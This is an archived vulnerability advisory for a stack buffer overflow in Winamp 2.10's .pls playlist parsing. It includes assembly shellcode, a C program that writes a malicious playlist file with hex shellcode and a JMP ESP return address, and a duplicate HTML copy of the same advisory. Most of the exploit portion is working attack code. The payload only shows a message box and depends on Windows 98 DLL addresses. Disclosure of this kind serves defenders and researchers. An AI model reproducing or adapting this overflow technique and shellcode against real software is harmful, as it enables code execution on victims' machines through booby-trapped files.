
winamp.win98.txt


Winamp version 2.10 is vulnerable to a stack-based buffer overflow when parsing .pls playlist files: an over-long File1= entry overwrites the saved return address, allowing arbitrary code execution when a malicious playlist is opened.

Code
`Author: Steve Fewer, [email protected]  
http://indigo.ie/~lmf  
  
Introduction:  
  
I recently uncovered a stack-based buffer overflow in Winamp version 2.10 which lets me execute arbitrary code. It is triggered through .pls files, which Winamp uses for playlists. This is unnerving because trading playlists over IRC during an mp3 trading session is entirely plausible, so a malicious playlist is a realistic delivery vector.
  
The overflow occurs when an entry greater than 580 bytes is read in from a .pls file. The saved return address (EIP) is the only register overwritten: it takes the four bytes that follow the first 580, and from there on is space for your shell code. e.g.
  
[playlist]
File1=<580 bytes><eip><shell code>
NumberOfEntries=1
  
The first 580 bytes get mangled around in memory, but the 585th byte (where our shell code starts) is pointed to by ESP, therefore a simple 'JMP ESP' or the like will land us back in our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in comctl32.dll, which Winamp loads. Pointing our EIP at that address lands us back where we want to be. Note that this address, like the ones hard-coded in the shell code below, is specific to the DLL build on the test system; on another Windows or comctl32 version it will point elsewhere and the playlist will simply crash Winamp.
  
This was all created/tested on Windows 98 [Version 4.10.1998]  
running on an Intel PII400 with 128MB RAM.  
  
  
The Shell Code:  
  
The shell code I wrote for this simply displays a message box and then calls exit(). However Winamp doesn't load msvcrt.dll, which is needed to call exit(), so we have to load it ourselves. I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for LoadLibraryA(). For calling MessageBox I used the address 0xBFF5412E in user32.dll (v4.10.1998), and for calling exit() I used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). Resolving these through GetProcAddress for compatibility's sake did not seem warranted for a proof of concept; as a consequence the shell code only works against exactly these DLL builds. (Note also that 0x78005504 contains a 0x00 byte, which is why the code below computes it with a subtraction instead of writing it as a literal.)
For the OP codes see the exploit further on.  
  
// This loads msvcrt.dll
// Stack frame: [ebp-0Ch..ebp-03h] receives "MSVCRT.DLL"; the zero pushed
// at [ebp-04h] leaves a NUL terminator behind the string at [ebp-02h].
push ebp
mov ebp,esp
xor eax,eax                 // eax = 0 (xor avoids the 0x00 bytes a mov imm would encode)
push eax                    // [ebp-04h] = 0
push eax                    // [ebp-08h] = 0
push eax                    // [ebp-0Ch] = 0 -> 12 zeroed bytes for the DLL name
mov byte ptr[ebp-0Ch],4Dh   // 'M'
mov byte ptr[ebp-0Bh],53h   // 'S'
mov byte ptr[ebp-0Ah],56h   // 'V'
mov byte ptr[ebp-09h],43h   // 'C'
mov byte ptr[ebp-08h],52h   // 'R'
mov byte ptr[ebp-07h],54h   // 'T'
mov byte ptr[ebp-06h],2Eh   // '.'
mov byte ptr[ebp-05h],44h   // 'D'
mov byte ptr[ebp-04h],4Ch   // 'L'
mov byte ptr[ebp-03h],4Ch   // 'L' -> "MSVCRT.DLL\0"
mov edx,0xBFF776D4          // &LoadLibraryA in kernel32.dll 4.10.1998 (hard-coded, Win98-specific)
push edx                    // [ebp-10h] = &LoadLibraryA
lea eax,[ebp-0Ch]
push eax                    // arg: lpLibFileName
call dword ptr[ebp-10h]     // LoadLibraryA("MSVCRT.DLL"); stdcall, the callee pops the argument
// This calls MessageBox to say 'Hi!'
push ebp
mov ebp,esp
xor edi,edi                 // edi = 0, reused below for both hWnd and uType
push edi                    // [ebp-04h] = 0 -> room for "Hi!\0"
mov byte ptr[ebp-04h],48h   // 'H'
mov byte ptr[ebp-03h],69h   // 'i'
mov byte ptr[ebp-02h],21h   // '!' ([ebp-01h] stays 0 as the terminator)
mov edx, 0xBFF5412E         // MessageBox entry in user32.dll 4.10.1998 (presumably the ANSI variant, given the byte string)
push edx                    // [ebp-08h] = &MessageBox
push edi                    // uType = 0 (MB_OK)
lea edx,[ebp-04h]
push edx                    // lpCaption = "Hi!"
push edx                    // lpText = "Hi!"
push edi                    // hWnd = NULL
call dword ptr[ebp-08h]     // MessageBox(NULL, "Hi!", "Hi!", 0)
// This calls exit()
push ebp
mov ebp,esp
mov edx,0xFFFFFFFF
sub edx,0x87FFAAFB          // edx = 0x78005504 = exit() in msvcrt.dll 6.00.8397.0; built by subtraction
                            // because the literal contains a 0x00 byte that would terminate the File1= string
push edx                    // [ebp-04h] = &exit
xor eax,eax
push eax                    // arg: status = 0
call dword ptr[ebp-04h]     // exit(0) -- never returns, so the smashed stack is never unwound
  
The Exploit:  
  
<-snip->  
  
/* Stack based buffer overflow exploit for Winamp v2.10  
* Author Steve Fewer, 04-01-2k. Mail me at [email protected]  
*  
* For a detailed description on the exploit see my advisory.  
*  
* Tested with Winamp v2.10 using Windows98 on an Intel  
* PII 400 with 128MB RAM  
*  
* http://indigo.ie/~lmf  
*/  
  
#include <stdio.h>  
  
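/* Writes crAsh.pls: a playlist whose File1= entry overflows Winamp 2.10's
 * stack buffer. Layout of the entry: 580 filler bytes | 4-byte saved-EIP
 * overwrite | shellcode (see the advisory text above).
 *
 * Returns 0 on success, 1 if the file could not be created or written.
 *
 * Every address baked in below (JMP ESP, LoadLibraryA, MessageBox, exit)
 * is specific to Windows 98 4.10.1998 / msvcrt 6.00.8397.0; on any other
 * build the payload will merely crash the player.
 */
int main(void)
{
    /* Bytes of filler needed before the saved return address is reached. */
    enum { PAD_LEN = 580 };

    /* Little-endian 0xBFB9CFF7: a 'JMP ESP' inside comctl32.dll, which
     * Winamp has loaded. After the ret, ESP points just past these four
     * bytes, i.e. at the first byte of the shellcode. */
    static const char eip[] = "\xF7\xCF\xB9\xBF";

    /* Shellcode: LoadLibraryA("MSVCRT.DLL"); MessageBox(0,"Hi!","Hi!",0);
     * exit(0). It must stay free of 0x00 and newline bytes: the .pls file
     * is line-based and a NUL would end the File1= value early. */
    static const char sploit[] =
        /* push ebp; mov ebp,esp; xor eax,eax; push eax x3 */
        "\x55\x8B\xEC\x33\xC0\x50\x50\x50"
        /* mov byte ptr [ebp-0Ch..-03h], "MSVCRT.DLL" */
        "\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43"
        "\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44"
        "\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C"
        /* mov edx,0xBFF776D4 (LoadLibraryA); push edx; lea eax,[ebp-0Ch];
         * push eax; call dword ptr [ebp-10h] */
        "\xBA\xD4\x76\xF7\xBF\x52\x8D\x45\xF4\x50\xFF\x55\xF0"
        /* push ebp; mov ebp,esp; xor edi,edi; push edi */
        "\x55\x8B\xEC\x33\xFF\x57"
        /* mov byte ptr [ebp-04h..-02h], "Hi!" */
        "\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21"
        /* mov edx,0xBFF5412E (MessageBox); push edx; push edi;
         * lea edx,[ebp-04h]; push edx; push edx; push edi; call [ebp-08h] */
        "\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8"
        /* push ebp; mov ebp,esp; mov edx,0xFFFFFFFF; sub edx,0x87FFAAFB
         * (= 0x78005504, exit, written this way to avoid a 0x00 byte);
         * push edx; xor eax,eax; push eax; call [ebp-04h] */
        "\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33"
        "\xC0\x50\xFF\x55\xFC";

    char pad[PAD_LEN];
    FILE *file;
    size_t i;

    printf("\n\n\t\t.......................................\n");
    printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
    printf("\t\t.......................................\n");
    printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
    printf("\t\t.........http://indigo.ie/~lmf.........\n");
    printf("\t\t.......................................\n\n");

    /* Filler (0x90 = NOP). Per the advisory these bytes are consumed
     * before the return address and are not executed; they just need to
     * be non-NUL, non-newline. Written with an explicit length below, so
     * no terminator is needed -- the original relied on "%s" over an
     * unterminated buffer, which read uninitialised stack. */
    for (i = 0; i < PAD_LEN; i++) {
        pad[i] = '\x90';
    }

    file = fopen("crAsh.pls", "wb");
    if (file == NULL) {
        perror("fopen crAsh.pls");
        return 1;
    }

    fputs("[playlist]\n", file);
    fputs("File1=", file);
    fwrite(pad, 1, sizeof pad, file);
    /* sizeof - 1: drop the string literal's trailing NUL. */
    fwrite(eip, 1, sizeof eip - 1, file);
    fwrite(sploit, 1, sizeof sploit - 1, file);
    fputs("\nNumberOfEntries=1", file);

    /* A short or failed write would silently produce a broken payload;
     * check the stream before trusting the file. */
    if (ferror(file)) {
        perror("write crAsh.pls");
        fclose(file);
        return 1;
    }
    if (fclose(file) != 0) {
        perror("close crAsh.pls");
        return 1;
    }

    printf("\t created file crAsh.pls loaded with the exploit.\n");
    return 0;
}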
  
<-snip->  
  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
  
------=_NextPart_000_0029_01BF56CF.4A7BA760  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META content=3D"text/html; charset=3Diso-8859-1" =  
http-equiv=3DContent-Type>  
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2>Nullsoft Winamp 2.10 buffer overflow=20  
advisory<BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=  
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR>Author:=20  
Steve Fewer, <A=20  
href=3D"mailto:[email protected]">[email protected]</A><BR>&nbs=  
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=  
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20  
<A=20  
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR>-=3D-=3D-=3D-=  
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=  
-=3D-=3D-=3D-=3D-=3D-=3D</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Introduction:</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>I recently uncovered a stack based =  
buffer overflow=20  
in winamp<BR>version 2.10 which lets me execute 'arbitrary code'. It is=20  
<BR>carried out through .pls files which winamp uses for playlists. =  
<BR>This is=20  
unnerving as it is a feasible plan to trade playlists on<BR>irc during a =  
mp3=20  
trading session with someone.</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>The overflow occurs when an entry =  
greater than 580=20  
bytes is <BR>read in from a .pls file. The EIP is the only register =  
overwritten=20  
<BR>in the next four bytes that follow, from there on is space for =  
<BR>your=20  
shell code. eg.</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>[playlist]<BR>File1=3D<580=20  
bytes><eip><shell code><BR>NumberOfEntries=3D1&nbsp; =  
</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>The first 580 bytes get mangled around =  
in memory=20  
but the 585 <BR>byte (where our shell code starts) is pointed to by the =  
ESP,=20  
<BR>therefore a simple 'JMP ESP' or the like will land us back in =  
<BR>our shell=20  
code. I used a 'JMP ESP' at address 0xBFB9CFF7 in <BR>comctl32.dll which =  
winamp=20  
loads. Pointing our EIP into that <BR>address lands us back where we =  
want to be.=20  
</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>This was all created/tested on Windows =  
98 [Version=20  
4.10.1998]<BR>running on an Intel PII400 with 128MB RAM.</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2><BR>The Shell Code:</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>The shell code I wrote for this simply =  
displays a=20  
message box <BR>and then calls exit(). However Winamp doesn't load =  
msvcrt.dll=20  
<BR>which is needed to call exit() so we have to load it ourselves. =  
<BR>I used=20  
the address 0xBFF776D4 in kernel32.dll (v4.10.1998) =  
for<BR>LoadLibraryA(). For=20  
calling Messagebox I used the address <BR>0xBFF5412E in user32.dll =  
(v4.10.1998)=20  
and for calling exit() I <BR>used the address 0x78005504 in msvcrt.dll=20  
(v6.00.8397.0). It <BR>didn't warrant using GetProcAddress for =  
compatibilities=20  
sake.<BR>For the OP codes see the exploit further on.</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp; // This loads=20  
msvcrt.dll<BR>&nbsp;&nbsp;&nbsp; push ebp<BR>&nbsp;&nbsp;&nbsp; mov=20  
ebp,esp<BR>&nbsp;&nbsp;&nbsp; xor eax,eax<BR>&nbsp;&nbsp;&nbsp; push=20  
eax<BR>&nbsp;&nbsp;&nbsp; push eax<BR>&nbsp;&nbsp;&nbsp; push=20  
eax<BR>&nbsp;&nbsp;&nbsp; mov byte =  
ptr[ebp-0Ch],4Dh<BR>&nbsp;&nbsp;&nbsp; mov=20  
byte ptr[ebp-0Bh],53h<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-0Ah],56h<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-09h],43h<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-08h],52h<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-07h],54h<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-06h],2Eh<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-05h],44h<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-04h],4Ch<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-03h],4Ch<BR>&nbsp;&nbsp;&nbsp; mov =  
edx,0xBFF776D4<BR>&nbsp;&nbsp;&nbsp;=20  
push edx<BR>&nbsp;&nbsp;&nbsp; lea eax,[ebp-0Ch]<BR>&nbsp;&nbsp;&nbsp; =  
push=20  
eax<BR>&nbsp;&nbsp;&nbsp; call dword ptr[ebp-10h]<BR>&nbsp;&nbsp;&nbsp; =  
// This=20  
calls MessageBox to say 'Hi!'<BR>&nbsp;&nbsp;&nbsp; push=20  
ebp<BR>&nbsp;&nbsp;&nbsp; mov ebp,esp<BR>&nbsp;&nbsp;&nbsp; xor=20  
edi,edi<BR>&nbsp;&nbsp;&nbsp; push edi<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-04h],48h<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-03h],69h<BR>&nbsp;&nbsp;&nbsp; mov byte=20  
ptr[ebp-02h],21h<BR>&nbsp;&nbsp;&nbsp; mov edx, =  
0xBFF5412E<BR>&nbsp;&nbsp;&nbsp;=20  
push edx<BR>&nbsp;&nbsp;&nbsp; push edi<BR>&nbsp;&nbsp;&nbsp; lea=20  
edx,[ebp-04h]<BR>&nbsp;&nbsp;&nbsp; push edx<BR>&nbsp;&nbsp;&nbsp; push=20  
edx<BR>&nbsp;&nbsp;&nbsp; push edi<BR>&nbsp;&nbsp;&nbsp; call dword=20  
ptr[ebp-08h]<BR>&nbsp;&nbsp;&nbsp; // This calls =  
exit()<BR>&nbsp;&nbsp;&nbsp;=20  
push ebp<BR>&nbsp;&nbsp;&nbsp; mov ebp,esp<BR>&nbsp;&nbsp;&nbsp; mov=20  
edx,0xFFFFFFFF<BR>&nbsp;&nbsp;&nbsp; sub =  
edx,0x87FFAAFB<BR>&nbsp;&nbsp;&nbsp;=20  
push edx<BR>&nbsp;&nbsp;&nbsp; xor eax,eax<BR>&nbsp;&nbsp;&nbsp; push=20  
eax<BR>&nbsp;&nbsp;&nbsp; call dword ptr[ebp-04h]</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>The Exploit:</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>/* Stack based buffer overflow exploit =  
for Winamp=20  
v2.10<BR>&nbsp;* Author Steve Fewer, 04-01-2k. Mail me at <A=20  
href=3D"mailto:[email protected]">[email protected]</A><BR>&nbs=  
p;*<BR>&nbsp;*=20  
For a detailed description on the exploit see my =  
advisory.<BR>&nbsp;*<BR>&nbsp;*=20  
Tested with Winamp v2.10 using Windows98 on an Intel<BR>&nbsp;* PII 400 =  
with=20  
128MB RAM<BR>&nbsp;*<BR>&nbsp;* <A=20  
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR>&nbsp;*/</FON=  
T></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>#include <stdio.h></FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>int main()<BR>{</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp;=20  
printf("\n\n\t\t.......................................\n");<BR>&nbsp;&nb=  
sp;&nbsp;=20  
printf("\t\t......Nullsoft Winamp 2.10 =  
exploit.....\n");<BR>&nbsp;&nbsp;&nbsp;=20  
printf("\t\t.......................................\n");<BR>&nbsp;&nbsp;&=  
nbsp;=20  
printf("\t\t.....Author: Steve Fewer, =  
04-01-2k.....\n");<BR>&nbsp;&nbsp;&nbsp;=20  
printf("\t\t.........http://indigo.ie/~lmf.........\n");<BR>&nbsp;&nbsp;&=  
nbsp;=20  
printf("\t\t.......................................\n\n");</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>char buffer[640];<BR>char eip[8] =3D=20  
"\xF7\xCF\xB9\xBF";<BR>char sploit[256] =3D=20  
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53<BR>\xC6=  
\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\=  
x2E\xC6<BR>\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\x=  
bF\x52\x8D\x45\xF4\x50<BR>\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xF=  
C\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21<BR>\xBA\x2E\x41\xF5\xBF\x52\x57\x8D=  
\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF<BR>\xFF\xFF\xFF\x81\=  
xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>FILE *file;</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp; for(int=20  
x=3D0;x<580;x++)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp; =  
buffer[x] =3D=20  
0x90;<BR>&nbsp;&nbsp;&nbsp; }</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>file =3D =  
fopen("crAsh.pls","wb");</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>fprintf(file, =  
"[playlist]\n");<BR>fprintf(file,=20  
"File1=3D");<BR>fprintf(file, "%s", buffer);<BR>fprintf(file, "%s",=20  
eip);<BR>fprintf(file, "%s", sploit);<BR>fprintf(file,=20  
"\nNumberOfEntries=3D1");</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial =  
size=3D2>fclose(file);<BR>printf("\t&nbsp;&nbsp;&nbsp;&nbsp;=20  
created file crAsh.pls loaded with the exploit.\n");<BR>return=20  
0;<BR>}</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial=20  
size=3D2><BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=  
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR></FONT></DIV></BO=  
DY></HTML>  
  
------=_NextPart_000_0029_01BF56CF.4A7BA760--  
  
  
`
